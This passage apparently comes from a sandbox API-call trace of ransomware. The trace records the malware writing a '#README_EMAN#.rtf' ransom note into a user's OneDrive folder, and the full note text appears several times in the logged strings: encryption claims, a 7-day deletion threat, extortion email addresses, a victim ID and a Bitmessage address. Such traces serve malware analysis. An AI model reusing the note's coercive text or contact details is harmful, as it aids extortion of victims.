https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.963] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x248a258, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nGoH\x93Ò\x14FE¶\x8a\x10Oå \x18¸a¸éP\x10úÈ\x13\n", lpUsedDefaultChar=0x0) returned 8717 [0298.963] WriteFile (in: hFile=0x27c, lpBuffer=0x248a258*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x248a258*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.964] CloseHandle (hObject=0x27c) returned 1 [0298.964] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mr\\#readme_eman#.rtf")) returned 0xffffffff [0298.964] GetLastError () returned 0x2 [0298.964] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0298.985] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 